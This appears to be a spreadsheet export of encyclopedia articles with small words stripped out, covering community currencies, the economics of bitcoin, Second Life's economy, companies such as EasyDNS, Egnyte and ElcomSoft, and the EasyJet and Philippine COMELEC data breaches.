international scope. other advantages cited include benefits environment, good remote areas without access traditional banks, "ideal launching small businesses piloting projects without spending cash", according view. disadvantages network still incurs administrative costs, although internet technology, costs less traditional lets group. there small required help defray administrative costs either one-time else small "transaction talents" compensate system's organizers work.other drawbacks include "unwieldy" since money useful primarily "widely accepted", consumer exchange service operate effectively, many consumers merchants employers need using system. also alternative paradigm money, requiring considerable adjustment perception (through education) positive negative balances (which erroneously perceived debt) one's account. interfacing currency nation's accounting "pose problems", possibly resulting accounting issues.other potential problems include possibility particular exchange cease operating persons credits built lose them), well possibilities error, fraud, difficulties dispute resolution problems trading currency. focus group research 1996 toronto, canada, lets, however, showed transparency mutual credit systems makes highly resilient difficult defraud. indeed participant joined expressed intent defrauding system found pointless. type class system emerge, however, participants services products great demand accumulate surplus credits cannot spend others great needs find unable accumulate them. source suggested administrative upper-limit ceiling number trades million; system gets trades this, becomes difficult manage administrative sense. also barter (economics) collaborative finance complementary currency credit union green economics green politics list community currencies united stateslocal currencylocal exchange trading system (lets)mutualism (economic theory) ripple monetary system sharing economy (access economy) time-based currency (time banking) bank (switzerland) references further reading george monbiot january 2009). state can't save need licence print money". guardian. london.timebanking external links community exchange system community exchange system australia</t>
  </si>
  <si>
    <t>EasyDNS</t>
  </si>
  <si>
    <t>easydns technologies inc. canadian internet service provider supplies hosting services operates mail service called easymail. company headquartered toronto, ontario.co-founder mark jeftovic, author book managing mission critical domains dns, maintains blog writes news issues related easydns internet domains general. history easydns co-founded 1998 mark jeftovic, colin viebrock john schmidt.on march 2000, easydns became affiliate icann accredited registrar opensrs (now tucows).in 2003 easydns became directly accredited icann. that year company began accepting payment e-gold.in april 2013, easydns started accepting bitcoin payment method. june company several caught day-long international denial-of-service attack, although attack aimed easydns customer.in august 2014, easydns acquired provider zoneedit.in 2017, easydns started providing ethereum name service (ens) integration domain names. controversies wikileaks 2010, confusion similarly named everydns, easydns widely reported service wikileaks. easydns subsequently approached wikileaks agreed host three domain names wikileaks. some easydns customers disapproved wikileaks threatened change providers. police intellectual property crime unit october 2013, request police intellectual property crime unit requested redirect torrentpond.com address controlled pipcu. this request refused legal basis. easydns suggested registrars complied pipcu's requests violated icann's transfer policies. filed request enforcement icann. following request, three domains suspended public domain registry ordered transferred easydns. illegal pharmaceutical sales fatality 2014, easydns centre controversy policy refusing take pages unlicensed online pharmaceutical companies accused selling controlled substances without prescription. easydns mark jeftovic referred national association boards pharmacy "batch clowns" sent easydns registrars letter ordering take websites unlicensed pharmacies without court orders prevent domains transferring registrars. doing would registrars violation icann registrar accreditation agreements.easydns clarified policy died taking "controlled substance" codeine phosphate purchased without prescription airmailchemist.com, online drug seller registered easydns technologies inc. easydns aware airmailchemist’s presence system, informed icann circumstances around man’s death contacted reporter. upon learning death, easydns immediately initiated contact added requirement online pharmacies licensed three online pharmaceutical accreditation agencies. leaked contact details from october 2018 october domain contact details 1,500 domain owners using easydns leaked whois query results system provided second largest domain registrar world, tucows, easydns uses backend manage domain names. references external links official website</t>
  </si>
  <si>
    <t>EasyJet data breach</t>
  </si>
  <si>
    <t>easyjet data breach cyberattack computer systems british airline easyjet. discovery easyjet first learned cyberattack january 2020. approximately nine million people affected credit card details 2,208 also accessed. easyjet notified information commissioner's office investigating breach. public admission easyjet publicly announced attack 2020. they told able notify customers whose details stolen april 2020. easyjet told "this highly sophisticated attacker. took time understand scope attack identify impacted". they also said could inform people investigation progressed enough able identify whether individuals affected, impacted information accessed".the affected data covers flight bookings made october 2019 march 2020.the stolen credit card details include card security code.easyjet said gone public notify nine million customers whose email addresses accessed beware phishing attacks would notify everybody may. passengers whose credit card details accessed notified april. they reveal details attack said seemed aimed "company intellectual property" rather information could used identity theft.easyjet obliged notify passengers whose basic booking details compromised announced details increase phishing attacks covid-19 pandemic. passport details accessed.the information commissioner's office said investigating. said "people right expect organisations handle personal information securely responsibly. when happen, investigate take robust action necessary".gdpr requires companies store personal details securely easyjet could face fines airlines' turnover 2019. also 2018 british airways cyberattack references</t>
  </si>
  <si>
    <t>Eco-Pesa</t>
  </si>
  <si>
    <t>eco-pesa name kenyan community currency, used reduce poverty support environmental conservation slums areas inside kongowea location, mombasa district, kenya. pesa swahili word money. eco-pesa's circulation year considered pilot resulted sustainable bangla-pesa model community currencies duplicated five communities kenya south africa. issuance residents could obtain eco-pesa part business network participating community events (such trash collection days) local sales services. introduction eco-pesa introduced william ruddick, 2010 three slum villages informal settlements) inside kongowea location mombasa county, namely: kisimu ndogo, shauri yako mnazi mmoja. once registered, local businesses become part business network. once network, businesses allowed exchange eco-pesa voucher kenyan shillings backed donor funds. they also receive business environmental training. businesses included limited general shops, pharmacies, health clinics, child care, haircuts, charcoal kiosks, produce sellers, poultry sellers, transportation providers, water sellers, distributors. eco-pesa security printed several security features including: visicoin printing, ink, security designed backgrounds watermarked paper fibers, well serial numbering.the eco-pesa vouchers available 5/ep, 10/ep, 20/ep denominations depict local landmarks kengelele bell, nyali beach nayli bridge.the advantages local currencies empowerment women demonstrated first phase eco-pesa, many women businesses eco-pesa.the first experiments supervision koru ruddick also served director green world campaign's kenya chapter mombasa. eco-pesa originally developed assistance green world campaign founder executive director, marc barasch. post eco-pesa pilot expansion william ruddick later founded grassroots economics foundation 2013 developed bangla-pesa model based results eco-pesa, informal settlement bangladesh, kenya. grassroots economics working employ mobile phone systems trade community currency. bangla-pesa uses [mutual credit] model longer need national currency donor funds keep running.other currencies kenya follow bangla-pesa model include: gatina-pesa kawangware, kangemi-pesa kangemi, lindi-pesa kibera, ng'ombeni-pesa mikindani. k'mali kokstad south africa well berg-rand brand bergrivier south africa also follow similar model.all local currencies emerged eco-pesa kenya (five 2016) experience grouped label sarafu-credit, originally issued supervision association named koru kenya, longer exist. allegation forgery indiegogo online petition 2013, will ruddick arrested five members koru kenya, suspicion forgery linked mombassa republican council (mrc). link dropped first, central bank kenya filled charge forgery.an indiegogo online petition issued gain support financial assistance arrested members koru kenya. petition managed raise total 8835 euros.the group released quickly forgery released months later charges never proved. references external links brief video eco-pesa brief video bangla-pesa (eco-pesa's predecessor)</t>
  </si>
  <si>
    <t>Economics of bitcoin</t>
  </si>
  <si>
    <t>bitcoin digital asset designed pseudonymous inventor, satoshi nakamoto, work currency. since bitcoin's first appearance 2008, generated wide variety responses analyses. classification bitcoin digital asset designed inventor, satoshi nakamoto, work currency. commonly referred terms like: digital currency,: digital cash, virtual currency, electronic currency, digital gold, cryptocurrency.the question whether bitcoin currency disputed. bitcoins three useful qualities currency, according economist january 2015: "hard earn, limited supply easy verify". economists define money store value, medium exchange unit account, agree bitcoin meet criteria. best medium exchange: march 2014, bitcoin market suffered volatility, limiting ability bitcoin stable store value, retailers accepting bitcoin currencies principal unit account.classification bitcoin united states government date unclear multiple conflicting rulings. 2013 judge amos mazzant united states district court eastern district texas stated "bitcoin currency form money". july 2016, judge teresa mary pooler eleventh judicial circuit court florida cleared michell espinoza state florida espinoza money-laundering charges faced involving bitcoin. judge pooler stated "bitcoin attributes common commonly refer money, differ many important aspects, certainly tangible wealth cannot hidden mattress like cash gold bars." september 2016, ruling judge alison nathan united states district court southern district york contradicted florida espinoza ruling stating "bitcoins funds within plain meaning term.— bitcoins accepted payment goods services bought directly exchange bank account. they therefore function pecuniary resources used medium exchange means payment." u.s. treasury categorizes bitcoin decentralized virtual currency. commodity futures trading commission classifies bitcoin commodity, internal revenue service classifies asset.the south african revenue service, legislation canada, ministry finance czech republic several others classify bitcoin intangible asset. bundesbank says bitcoin virtual currency digital money. recommends using term "crypto token".the people's bank china stated bitcoin fundamentally currency investment target".journalists academics also debate call bitcoin. some media outlets make distinction "real" money bitcoins, others call bitcoin real money. wall street journal declared commodity december 2013. forbes journalist referred digital collectible. university amsterdam computer scientists proposed term "money-like informational commodity".in addition above, bitcoin also characterized payment system.: general according research produced cambridge university 2017, million million unique users actively using cryptocurrency wallet, using bitcoin. number active users grown significantly since 2013 (there million unique users time). buying selling bitcoins bought sold offline. participants online exchanges offer bitcoin sell bids. using online exchange obtain bitcoins entails risk, and, according study published april 2013, exchanges fail take client bitcoins them. exchanges since implemented measures provide proof reserves effort convey transparency users. offline, bitcoins purchased directly individual bitcoin atm. bitcoin machines however traditional atms. bitcoin kiosks machines connected internet, allowing insertion cash exchange bitcoins. bitcoin kiosks connect bank also charge transaction fees high exchange rates us$50 rates elsewhere.as 2016 estimated bitcoin atms operating globally, majority (500+) united states. price volatility according mark williams, 2014, bitcoin volatility seven times greater gold, eight times greater 500, times greater u.s. dollar.attempting explain high volatility, group japanese scholars stated stabilization mechanism. bitcoin foundation contends high volatility insufficient liquidity, forbes journalist claims related uncertainty long-term value, high volatility startup currency makes sense, "because people still experimenting currency figure useful is."there uses volatility matter, online gambling, tipping, international remittances. 2014, pro-bitcoin venture capitalists argued greatly increased trading volume planned high-frequency trading exchanges would generate needed decrease price volatility.the price bitcoins gone various cycles appreciation depreciation referred bubbles busts. 2011, value bitcoin rapidly rose us$0.30 us$32 returning us$2. latter half 2012 2012–13 cypriot financial crisis, bitcoin price began rise, reaching high us$266 april 2013, crashing around us$50. november 2013, cost bitcoin rose all-time peak us$1,242. some evidence suggests part peak price bitcoin price manipulation. 2014, price fell sharply, april remained depressed little half 2013 prices. august 2014 us$600.in january 2015, noting bitcoin price dropped lowest level since spring 2013 around us$224 york times suggested "[w]ith signs rally offing, industry bracing effects prolonged decline prices. particular, bitcoin mining companies, essential currency's underlying technology, flashing warning signs." also january 2015, business insider reported deep drug dealers "freaking out" lost profits unable convert bitcoin revenue cash quickly enough price declined danger dealers selling reserves stay business might force bitcoin price further.economic theory suggests volatility price bitcoin drop business consumer usage bitcoin increases. reason usage payments reduces sensitivity exchange rate beliefs speculators future value virtual currency. according wall street journal, april 2016, bitcoin starting look slightly stable gold. march 2017, price bitcoin surpassed value ounce gold first time price surged all-time high. study electronic commerce research applications, going back though network's historical data, showed value bitcoin network measured price bitcoins, roughly proportional square number daily unique users participating network. this form metcalfe's suggests network demonstrating network effects proportional level user adoption. speculative bubble bitcoin characterized speculative bubble eight laureates nobel memorial prize economic sciences: paul krugman, robert shiller, joseph stiglitz, richard thaler, james heckman, thomas sargent, angus deaton, oliver hart; central bank officials including alan greenspan, bernanke, janet yellen, agustín carstens, vítor constâncio, nout wellink. investors warren buffett george soros respectively characterized "mirage" "bubble"; business executive jack called "bubble". views economists 2014, nobel laureate robert shiller stated bitcoin "exhibited many characteristics speculative bubble"; 2017, shiller wrote bitcoin best current example speculative bubble.economist john quiggin 2013 said "bitcoins demonstrably valueless financial asset ever created".researchers neil gandal, hamrick, tyler moore, tali oberman claimed late 2013, price manipulation person likely caused price spike us$150 us$1000.nobel laureate joseph stiglitz 2017 said "it’s bubble that’s going give people exciting times rides goes down." emphasized criminals, lack socially useful purpose, said outlawed.nobel laureate paul krugman wrote 2018 bitcoin bubble wrapped techno-mysticism inside cocoon libertarian ideology". criticized slow expensive means payment, used mostly blackmarket goods, without "tether reality".nobel laureate richard thaler emphasizes irrationality bitcoin market bubble, demonstrating irrationality example firms added word blockchain names large increases stock price. extremely high volatility bitcoin's price also irrationality according thaler.four nobel laureates, james heckman, thomas sargent, angus deaton, oliver hart, characterized bitcoin bubble joint press conference 2018. hart cited christopher sims's work showing intrinsic value bitcoin. heckman compared bitcoin tulip bubble. deaton pointed bitcoin's criminals.professor nouriel roubini york university called bitcoin "mother bubbles", writing underlying blockchain technology "massive obstacles standing way", including lack "common universal protocols" kind enabled early internet. according roubini, bitcoin failed unit account, means payment, store value; calls claim bitcoin cannot debased "fraudulent". "scammers, swindlers, charlatans, carnival barkers (all conflicted insiders) tapped clueless retail investors' fomo ('fear missing out'), taken ride," writes. views central bank officials early claims bitcoin bubble focused lack intrinsic value bitcoin. these claims include former federal reserve chairman alan greenspan 2013. stated "you really stretch imagination infer intrinsic value bitcoin able it."in 2017 greenspan compared bitcoin continental dollar, ultimately collapsed. said "humans sorts things worth anything. people gamble casinos odds them. never stopped anybody."former chair bernanke 2015) outgoing chair janet yellen 2017) expressed concerns stability bitcoin's price lack medium transactions.agustín carstens, head bank international settlements, called bitcoin combination bubble, ponzi scheme environmental disaster", warned cryptocurrencies undermining public trust financial system.david andolfatto, vice president federal reserve bank louis, stated, bitcoin bubble? yes, bubble defined liquidity premium." according andolfatto, price bitcoin "consists purely bubble".: comparisons bitcoin tulip mania seventeenth-century holland made vice-president european central bank, vítor constâncio former president dutch central bank, nout wellink. 2013, wellink remarked, "this worse tulip mania least tulip end], nothing." views investors executives american investor warren buffett warned investors bitcoin 2014, "stay away it's mirage, basically." repeated warning 2018 calling bitcoin "probably poison squared". believes bitcoin non-productive asset. "when buying nonproductive assets, counting next person going they're even excited another next person coming along."buffett's close associate charlie munger even direct disdain. trading cryptocurrencies "just dementia" according munger. bitcoin "worthless" "turd".john bogle, founder vanguard group, also direct "avoid bitcoin like plague. make clear? .... there nothing support bitcoin except hope sell someone paid it."george soros, answering audience question speech davos, switzerland, 2018, said cryptocurrencies store value economic bubble. nevertheless, crash rising influence dictators trying "build nest abroad".james chanos, known "dean short sellers", believes bitcoin cryptocurrencies mania useful avoidance otherwise hiding income government. bitcoin simply security speculation game masquerading technological breakthrough monetary policy".two lead software developers bitcoin, gavin andresen mike hearn, warned bubbles occur. september 2017, jamie dimon referred bitcoin "fraud", comparing pyramid schemes, stated jpmorgan chase would fire employees trading company released report critical cryptocurrency. however, january 2018 interview jamie dimon voiced regrets earlier bitcoin remarks, noted "the blockchain real, cryptodollars stuff like that. icos look everyone individually."alibaba chairman jack stated 2018, "there bubble blockchain, there's bitcoin bubble" "[blockchain] technology isn’t bubble, bitcoin likely is". fraud concerns some journalists, economists, central bank estonia voiced concerns bitcoin ponzi scheme. 2013, eric posner, professor university chicago, stated real ponzi scheme takes fraud; bitcoin, contrast, seems like collective delusion." 2014 reports world bank: swiss federal council: examined concerns came conclusion bitcoin ponzi scheme. 2017 billionaire howard marks referred bitcoin pyramid scheme.on september 2017, jamie dimon, jpmorgan chase, called bitcoin "fraud" said would fire anyone firm caught trading zero hedge claimed dimon made statement, morgan also purchased large amount bitcoins clients. value forecasts financial journalists analysts, economists, investors attempted predict possible future value bitcoin. april 2013, economist john quiggin stated, "bitcoins attain true value zero sooner later, impossible when". similar forecast made november 2014 economist kevin dowd.in december 2013, finance professor mark williams forecast bitcoin would trade less mid-year 2014. indicated period bitcoin exchanged $344 (april 2014) july 2014 bitcoin $609. december 2014, williams said, "the probability success low, hit, reward large."in november 2014, david yermack, professor finance york university stern school business, forecast november 2015 bitcoin worthless. indicated period bitcoin exchanged $176.50 (january 2015) november 2015 bitcoin $309.90.in 2013, bank america rate strategist david forecast maximum fair value bitcoin $1,300. bitcoin investor cameron winklevoss stated december 2013 "small bull case scenario bitcoin is... 40,000 coin". obituaries "death" bitcoin proclaimed numerous times. journalist recorded "obituaries" early 2015.forbes magazine declared bitcoin "dead" june 2011, followed gizmodo australia august 2011. wired magazine wrote "expired" december 2012. ouishare magazine declared, "game over, bitcoin" 2013, york magazine stated bitcoin path grave" june 2013. reuters published "obituary" bitcoin january 2014. street insider declared bitcoin "dead" february 2014, followed weekly standard march 2014, salon march 2014, vice news march 2014, financial times september 2014. january 2015, today stated bitcoin "headed heap", telegraph declared "the bitcoin experiment". january 2016, former bitcoin developer mike hearn called bitcoin "failed project".peter greenhill, director e-business development isle man, commenting obituaries paraphrased mark twain saying "reports bitcoin's death greatly exaggerated". reception some economists responded positively bitcoin others expressed skepticism. françois velde, senior economist chicago fed, described elegant solution problem creating digital currency". paul krugman brad delong found fault bitcoin, questioning reasonably stable store value whether floor value. economist john quiggin criticized bitcoin "the final refutation efficient-market hypothesis".david andolfatto, vice president federal reserve bank louis, stated bitcoin threat establishment, argues good thing federal reserve system central banks, prompts institutions operate sound policies.: free software movement activist richard stallman criticized lack anonymity called reformed development. paypal president david marcus calls bitcoin "great place assets" claims currency price volatility reduced. bill gates, relation cost moving money place place interview bloomberg l.p. stated: "bitcoin exciting shows cheap be."in november 2013, three government officials testified senate hearings "bitcoin legitimate uses". according washington post, "most witnesses echoed sentiments." acceptance merchants most bitcoin transactions take place cryptocurrency exchange, rather used transactions merchants. delays processing payments blockchain minutes make bitcoin difficult retail setting. prices usually quoted units bitcoin many trades involve one, sometimes two, conversions conventional currencies. merchants accept bitcoin payments payment service providers perform conversions.in 2017 2018 bitcoin's acceptance among major online retailers included three u.s. online merchants, five 2016. reasons decline include high transaction fees bitcoin's scalability issues long transaction times.bloomberg reported largest crypto merchant-processing services handled million june 2018, $411 million september 2017. bitcoin "not actually usable" retail transactions high costs inability process chargebacks, according nicholas weaver, researcher quoted bloomberg. high price volatility transaction fees make paying small retail purchases bitcoin impractical, according economist grauer. bitcoin started accepted also real estate payments late 2017. first recorded sale house exchange bitcoin happened september 2017, texas based kuper sotheby's international realty brokered deal using bitpay.com process payment.two months later, first recorded sale apartment world first real estate property europe sold bitcoin november 2017 czech republic. czech real estate agency home hunters brokered deal three-room apartment russian buyer without using payment service providers all.some u.s. political candidates, including york city democratic congressional candidate jeff kurzon said would accept campaign donations bitcoin. payment service providers merchants accepting bitcoin, dish network, services bitcoin payment service providers bitpay coinbase. when customer pays bitcoin, payment service provider accepts bitcoin behalf merchant, directly converts sends obtained amount merchant's bank account, charging less percent service. retail transactions design bitcoin, retail figures estimates. according swanson, head business development hong kong-based cryptocurrency technology company, 2014, daily retail purchases made bitcoin worth $2.3 million. technology review estimates that, february 2015, fewer 5,000 bitcoins (worth roughly $1.2 million time) used retail transactions, concludes 2014 appears little increase retail purchases using bitcoin." financial institutions bitcoin companies difficulty opening traditional bank accounts lenders leery bitcoin's links illicit activity. according antonio gallippi, co-founder bitpay, "banks scared deal bitcoin companies, even really want to". 2014, national australia bank closed accounts businesses ties bitcoin, hsbc refused serve hedge fund links bitcoin. australian banks general reported closing bank accounts operators businesses involving currency; become subject investigation australian competition consumer commission. nonetheless, australian banks adopted blockchain technology bitcoin based.in september 2019 central bank venezuela, request pdvsa, tests determine bitcoin ethereum could held central bank's reserves. request motivated company's goal suppliers. investment some argentinians bought bitcoins protect savings high inflation possibility governments could confiscate savings accounts. during 2012–2013 cypriot financial crisis, bitcoin purchases cyprus rose fears savings accounts would confiscated taxed.other methods investment bitcoin funds. first regulated bitcoin fund established jersey july 2014 approved jersey financial services commission. also, 2012 attempt made cameron tyler winklevoss (who april 2013 claimed owned nearly bitcoins existence) establish bitcoin etf. march 2017 bitcoin declined regulatory concerns. price fell minutes, soon mostly recovered. early 2015, announced plans launch york-based bitcoin exchange named gemini, received approval launch october 2015. 2015, bitcoin investment trust started trading otcqx market gbtc.in 2013 2014, european banking authority financial industry regulatory authority (finra), united states self-regulatory organization, warned investing bitcoins carries significant risks. forbes named bitcoin best investment 2013. 2014, bloomberg named bitcoin worst investments year. 2015, bitcoin topped bloomberg's currency tables.to improve access price information increase transparency, april 2014 bloomberg announced plans list prices bitcoin companies kraken coinbase 320,000 subscription financial data terminals. 2015, intercontinental exchange inc., parent company york stock exchange, announced bitcoin index initially based data coinbase transactions.according bloomberg, 2013 bitcoin wallets million worth bitcoins. number bitcoin millionaires uncertain people wallet. venture capital venture capitalists, peter thiel's founders fund, invested us$3 million bitpay, purchase bitcoins themselves, instead funding bitcoin infrastructure like companies provide payment systems merchants, exchanges, wallet services, etc. 2012, incubator bitcoin-focused start-ups founded adam draper, financing help father, venture capitalist draper, largest bitcoin holders winning auction 30,000 bitcoins, time called 'mystery buyer'. company's goal fund bitcoin businesses within years $10,000 $20,000 stake. investors also invest bitcoin mining. according 2015 study paolo tasca, bitcoin startups raised almost billion three years 2012 2015). crowdfunding bitcoin useful crowdfunding. example, college football sign netted $20,000 donations bitcoin enthusiast. shown local company broadsheet mom, send bitcoins". political economy decentralization money offered virtual currencies like bitcoin theoretical roots austrian school economics subjective theory value, especially friedrich hayek book denationalisation money: argument refined, advocates complete free market production, distribution management money monopoly central banks.bitcoin appeals tech-savvy libertarians, exists outside institutional banking system control governments. however, researchers looking uncover reasons interest bitcoin find evidence google search data linked libertarianism.bitcoin's appeal reaches left wing critics, "who perceive state banking sector representing elite interests, recognising potential collective direct democratic governance currency" socialists proposing "own states, complete currencies", right wing critics suspicious government, time activities within regulated banking system responsible severity financial crisis 2007–08, "because governments fully living responsibility comes state-sponsored money". journalists describe bitcoin book "about freeing people tyranny centralised trust". also cryptoeconomics notes references</t>
  </si>
  <si>
    <t>Economy of Second Life</t>
  </si>
  <si>
    <t>virtual world second life economy virtual token referred linden dollars (l$). economy, users (called "residents") sell another directly, using linden, closed-loop virtual token within second life platform. linden dollars monetary value redeemable monetary value linden lab. resident surplus linden dollars earned second life business experiential play offer exchange users lindex exchange provided linden lab. this economy independent price game, users linden lab, other. linden reports second life economy generated us$3,596,674 economic activity month september 2005, september 2006 second life reported us$64,000,000.in 2009, total size second life economy grew us$567 million, entire u.s. virtual goods market. gross resident earnings million dollars 2009 growth 2008. basis basis economy residents (that users, opposed linden lab) sell services virtual goods another free market. services include camping, working stores, custom content creation, services. virtual goods include buildings, vehicles, devices kinds, animations, clothing, skin, hair, jewelry, flora fauna, works art, breedable in-game animals pets foxes, turtles, horses, cats, dogs, fish, dragons, original in-game pets called meeroos. earn linden dollars second life, must find customers willing services products supply, like real life. because existence virtual land, active virtual real estate market. originally land comes linden (which part pricing revenue stream them), bought sold much like real-life real estate. mainstream media reported residents earn large incomes real estate market.in addition main economy, residents receive small weekly stipend, depending kind account have, joined second life. there also virtual equivalent minimum wage jobs charitable organizations introduce residents consumer economy. lindex currency exchange residents purchase directly second life viewer, logging website using lindex exchange. ratio (l$:us$) floating exchange rate depending supply demand; june 2017, exchange rates average approximately l$252/us$1. linden dollars purchased sold lindex current market rate, residents limit better exchange rate. however, limit orders take longer fulfilled market rates. between june 2008 june 2017, rate remained stable high l$270/us$1 l$240/us$1. economic issues government second life residents mostly government. part enabled fact also physical damage, principle possible theft property (excluding virtual content), large scale, military groups role players restricted "damage-enabled" sims like eridanus similar areas. thus, many functions government required. hand, always need dispute resolution. lowest level, property rights reign supreme. building's owner makes rules, simply eject resident wish without cause. owner square meters lord manor, so-called land barons lords much larger ones. some groups people second life created small-scale political structures. example, might band together, purchase property group's name, agree follow in-group rules regulations, elect officers, support monarchy, etc. highest level, linden true owner second life, within second life terms service (tos), ultimate authority. monetary policy historical perspective linden monetary policy, articles posted 2007 2008 ludwig mises institute demonstrate linden dollar concept captured imagination economists philosophers. while actual currency, linden dollar's function within second life virtual world allowed many thinkers draw interesting parallels linden dollar token/the second life economy real world currencies/economies. up-to-date information second life's monetary policy found within second life's terms service. acts linden linden lab, actual owner software server-side hardware makes second life, ultimate authority change aspects world, economy physics terms-of-service. changes made proposed linden thus far-reaching lead unexpected results. some changes effect creating markets, also occasion destroyed removed value existing ones, inadvertently given market leader particular time unique advantages entrench market leader future. some unless power tightly controlled transparent, linden economy unlikely attract large investment.one example infonet, in-world newspaper information delivery service for-profit basis, formerly limited effectiveness limited range access points (true many systems sl). when concept "telehubs" removed game, linden replaced "infohubs", included infonet access point hosted free system-owned land; also placed infonet access points welcome areas users arrive, user normally permitted leave business-related objects. this effect giving infonet instant substantial advantage.recent linden acts greater economic import include banning wagering games random chance real-life sporting events soon rule change announced, gaming regions given days close. gaming region owners game scripters either found avenues business ceased operations. fallout largest linden dollar bank ginko financial, linden dollar atms major gaming regions, reserves drained completely within hours, never able catch linden dollar withdrawal requests, eventually amounted l$55 million deposits l$180 million. ginko's assets primarily invested either things poor liquidity, virtual securities trading significantly purchase price. second quarter 2008, linden increased amount land supplied daily, effect lowering prices "from bottom lindens lindens meter overnight."shortly events, linden began collecting value added (vat) customers live european union (aside customers exempts tax). this applied membership, land purchase, land maintenance fees paid real world currency (e.g., euro) european members linden lab. previously, linden absorbed cost vat. linden attempt collect might theoretically applicable linden transactions individual second life residents. when charging fees began, discussion among europeans leaving else transferring lands american partners, getting lines work involve fees paid linden euros. american land barons position offer shelters europeans (although theory european users could still cash transfers partners.) linden economy factors because business models rely revenue model existing outside second life, businesses affect traditional approach second life business general second life economy. example, slippcat advertising system encourages companies provide content second life obtained free generates income owner displaying advertisements users clicked [1]. businesses especially vulnerable business disruption zero marginal cost production. 2007, anshe chung criticised marketing line furniture every item sold linden dollars (approximately cents.) selling items viable anshe majority income came sale maintenance land, used host houses within furniture placed; posed threat furniture makers prices would make impossible stores supported auxiliary business compete. november 2009, linden announced considering charging l$99/month per-item listing "freebies" (free items) xstreetsl, e-commerce website, previously could exchanged free site. also announced xstreetsl would charge higher commissions non-freebies, along l$10/month per-item items. this seen user community ploy minimize number free low-priced items site.the cost business allows unprofitable business models sustained lower real world cost would possible business real life. references external links investing online property boom currency converter: linden dollar dollar</t>
  </si>
  <si>
    <t>Egnyte</t>
  </si>
  <si>
    <t>egnyte software company headquartered mountain view, california. sells cloud-based content security, compliance, collaboration tools businesses. egnyte founded 2007 focus modernized file servers, since shifted selling tools help users securely collaborate coworkers third parties. history egnyte founded 2007, incorporated 2008. privately-held company founded vineet jain, rajesh ram, kris lahiri, amrit jassal.egnyte received million seed venture capital 2007, million july 2009, million 2011, million 2012. egnyte announced $29.5 million investment 2013 included seagate, centurylink, northgate capital, prior investors kleiner perkins, google ventures polaris partners. date, egnyte raised $137.5 million, including million series funding 2018, goldman sachs.by 2019, company reported 16,000 customers worldwide, reached $100 million annual recurring revenue.egnyte initially sold cloud on-premises file servers later added features collaboration security shifted focus cloud content governance businesses. 2020, combined primary products—egnyte protect egnyte connect—into platform manage, govern, secure data. features egnyte platform provides content security, compliance, collaboration capabilities govern content. egnyte's software used scan range data repositories malware—including email, on-premises storage, third-party cloud storage—and block ransomware attacks spreading. egnyte also governance risk dashboard analyzes organization’s risk level provides feedback areas improvement.egnyte’s collaboration features include cloud storage, well co-editing files microsoft google workspace. egnyte uses machine learning predictably cache files faster local access automatically categorize sensitive content.egnyte integrates number business productivity tools, including box, onedrive, dropbox, slack, microsoft 365, google workspace, aws, salesforce. also sells industry-specific software construction life sciences industries.egnyte offers tiered pricing plans varying capabilities. example, saas subscribers ransomware protection 2,000 known threats file versioning, enterprise customers access file restoration abnormal activity detection features. also cloud storage comparison file synchronization software content management file sharing hybrid cloud on-premises software references</t>
  </si>
  <si>
    <t>ElcomSoft</t>
  </si>
  <si>
    <t>elcomsoft privately owned software company headquartered moscow, russia. since establishment 1990, company working computer security programs, main focus password system recovery software. dmca case july 2001, dmitry sklyarov, russian citizen employed elcomsoft time visiting united states con, arrested charged violating united states dmca writing elcomsoft's advanced ebook processor software. later released bail allowed return russia, charges dropped. charges elcomsoft not, court case ensued, attracting much public attention protest. december 2002, elcomsoft found guilty four charges dmca. thunder tables thunder tables company's technology developed ensure guaranteed recovery microsoft word microsoft excel documents protected 40-bit encryption. technology first appeared 2007 employs time–memory tradeoff method build pre-computed hash tables, open corresponding files matter seconds instead days. these tables take around 4gb. far, technology used password recovery programs: advanced office password breaker advanced password recovery. cracking wi-fi password gpus 2009 elcomsoft released tool takes wpa/wpa2 hash codes uses brute-force methods guess password associated wireless network.the advantages using methods traditional ones, rainbow tables, numerous. vulnerability canon authentication software november 2010, elcomsoft announced encryption system used canon cameras ensure pictures exif metadata altered flawed cannot fixed. day, dmitry sklyarov gave presentation confidence conference prague demonstrating flaws. among others, showed image astronaut planting flag soviet union moon; images pass canon's authenticity verification. nude celebrity photo leak 2014, attacker used elcomsoft phone password breaker guess celebrity jennifer lawrence's password obtain nude photos. wired said apple's cloud services, "...cloud services might secure leaving front door mat." references</t>
  </si>
  <si>
    <t>Commission on Elections data breach</t>
  </si>
  <si>
    <t>march 2016, hackers banner "anonymous philippines" hacked website philippine commission elections (comelec) defaced hackers left message calling tighter security measures vote counting machines (vcm) used 2016 philippine general election within separate group hackers, lulzsec pilipinas posted online link claims entire database comelec updated post include three mirror link index database's downloadable files. leaked files lulzsec pilipinas amounts gigabytes.the comelec website returned normal 03:15 (pst) march 2016. comelec spokesperson, james jimenez, stated twitter account that, continue scour site, databases would remain temporarily off.the incident considered biggest private data leak philippine history leaving millions registered voters risk.55 million registered voters risk data breach according security firm, trend micro potentially surpassing office personnel management data breach affected million people.a searchable website, called wehaveyourdata, containing sensitive data filipino registered voters early april website taken assistance u.s. department justice since domain website bought us-based hosting company. website found hosted russia. extent breach trend micro conducted investigation extent data breach. found million records overseas filipino voters, included passport numbers expiry dates included data dumps hackers. security firm found breach "alarming" since said data easily accessible public plain text. also added 15.8 million record fingerprints along list people office since 2010 elections found firm's investigation. firm also found files concerning candidates running election filename "votesobtained" firm infers reflect number votes received particular candidates. said figures "votesobtained" files null time trend micro conducted investigation.the commission elections chairman, andres bautista said told confidential information leaked, saying breach would affect election body's preparation 2016 elections. commission also emphasized database website accessible public sensitive information hosted website. said results website election body planning hosted different website different better security measures. added database might fake saying biometrics date compromised hackers opposed trend micro's findings. comelec also noted trend micro accessed dumped data hackers investigation said capability validating data since access original database. perpetrators april comelec announced national bureau investigation "very good lead" regarding hackers behind breach. perpetrators charged violations cybercrime prevention act.on april, national bureau investigation (nbi) apprehended suspected hackers, later identified paul biteng, 20-year-old graduate student, home sampaloc, manila. authorities took three weeks order track hacker. confiscated biteng's desktop computer, used hacking, forensic examination. biteng, member hacking group anonymous philippines, admitted defaced comelec website, denied contribution data leak. also admitted hacking intended show vulnerable comelec website possible cases include violation cybercrime prevention 2012.about eight days later, second hacker, named joenel asis also 23-year-old computer science graduate, apprehended house muntinlupa. press conference held april comelec chairperson andres bautista identified asis ringleaders notorious hacker group, lulzsec pilipinas. bautista said asis admitted hacking website leaking comelec database. also admitted collaborated biteng hacking incident. biteng breached server comelec website, asis downloaded gigabyte voter database five days website defaced march while asis leaked data though lulzsec pilipinas website, denied group created website, wehaveyourdata. assured data leak affect 